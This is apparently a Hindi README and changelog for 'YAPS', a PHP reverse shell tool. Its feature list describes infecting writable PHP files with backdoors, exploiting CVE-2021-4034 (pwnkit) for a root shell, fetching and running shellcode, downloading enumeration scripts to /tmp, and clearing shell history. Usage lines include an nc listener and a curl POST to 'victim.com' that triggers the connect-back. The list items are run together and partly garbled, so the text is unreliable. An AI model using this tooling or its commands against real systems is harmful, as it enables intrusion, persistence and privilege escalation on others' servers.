
एक और PHP शेल - सबसे पूर्ण PHP रिवर्स शेल

हाँ, जैसा कि नाम से पता चलता है, यह एक और PHP रिवर्स शेल है, जो सैकड़ों उपलब्ध में से एक है, लेकिन कुछ लाभों के साथ। यह एक एकल PHP फ़ाइल है जिसमें इसके सभी फ़ंक्शन हैं और आप इसे एक सरल TCP लिसनर (जैसे nc -lp 1337) के माध्यम से नियंत्रित कर सकते हैं।
वर्तमान संस्करण (1.5) में, इसके मुख्य फ़ंक्शन केवल लिनक्स सिस्टम का समर्थन करते हैं, लेकिन मैं इसे विंडोज़ पर भी काम करने की योजना बना रहा हूँ।
यह वर्तमान में अपने पहले संस्करण में है और मैंने अभी तक इसका अधिक परीक्षण नहीं किया है, और अभी भी बहुत सी चीज़ें हैं जो मैं अगले संस्करणों के लिए करने और सुधारने का इरादा रखता हूँ (यह अभी पूरा नहीं हुआ है!), इसलिए कृपया मुझे बताएं यदि आपको कोई बग मिले या सुविधा या सुधार के लिए कोई सुझाव हो। =)
!interactive से एक इंटरैक्टिव शेल स्पॉन कर सकते हैं)
rlwrap nc -lp <ip> <port> का उपयोग न करें)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s या yaps.php?silent सेट कर सकते हैंphp yaps.php ip port के साथ CLI के माध्यम से चला सकते हैं!help - सहायता मेनू प्रदर्शित करें!all-colors - सभी रंगों को टॉगल करें (रंगहीन TTY के साथ संगत)!color - PS1 रंग टॉगल करें (केवल स्थानीय रूप से, कोई पर्यावरण चर नहीं बदला जाता)!duplicate - एक और YAPS कनेक्शन स्पॉन करें!enum - LinPEAS और LinEnum को /tmp में डाउनलोड करें और उपयोग के लिए तैयार करें!info - लक्ष्य के बारे में जानकारी सूचीबद्ध करें (वह एनुमरेशन जिसका मैंने ऊपर उल्लेख किया)!infect - लिखने योग्य PHP फ़ाइलों को बैकडोर से संक्रमित करें!interactive - अन्य पोर्ट पर इंटरैक्टिव रिवर्स शेल स्पॉन करें (sudo, su, mysql, आदि के साथ काम करता है)!passwd - पासवर्ड विकल्प (सक्षम, अक्षम, सेट, संशोधित)!php - दूरस्थ होस्ट पर PHP लिखें और चलाएं





v1.5 - 12/02/2022
!shellcode जोड़ा गया मनमाना शेलकोड प्राप्त करने और चलाने के लिएduplicate() फ़ंक्शन में सुधार (अब आप पोर्ट की एक श्रेणी निर्दिष्ट कर सकते हैं)stabilize से interactive में बदला गयाv1.4 - 04/02/2022
!pwnkit जोड़ा गयाverify_update() फ़ंक्शन में सुधारv1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect जोड़ा गया!stabilize पेलोड बदला गया (बग ठीक किए गए)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate जोड़ा गया--update|-u)--help|-h)php yaps.php ip port)v1.1 - 12/07/2021
!all-colors जोड़ा गया टर्मिनल रंगों को टॉगल करने और रंगहीन TTY के साथ काम करने के लिएexit कमांड जोड़ा गया सॉकेट बंद करने (शेल छोड़ने) के लिए!stabilize में पेलोड बदला गया HISTSIZE और HISTFILE को अनसेट करने के लिए!info में CPU और meminfo प्राप्त करने की विधि बदली गईv1.0.1 - 08/07/2021
[x,y,z] को array(x,y,z) में बदला गयाकुछ विचार इन उपकरणों से प्रेरित थे:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!pwnkit - CVE-2021-4034 का शोषण करने और रूट रिवर्स शेल स्पॉन करने का प्रयास करता है!shellcode - दूरस्थ होस्ट पर शेलकोड भेजें और चलाएं!suggester - Linux Exploit Suggester को /tmp में डाउनलोड करें और उपयोग के लिए तैयार करें

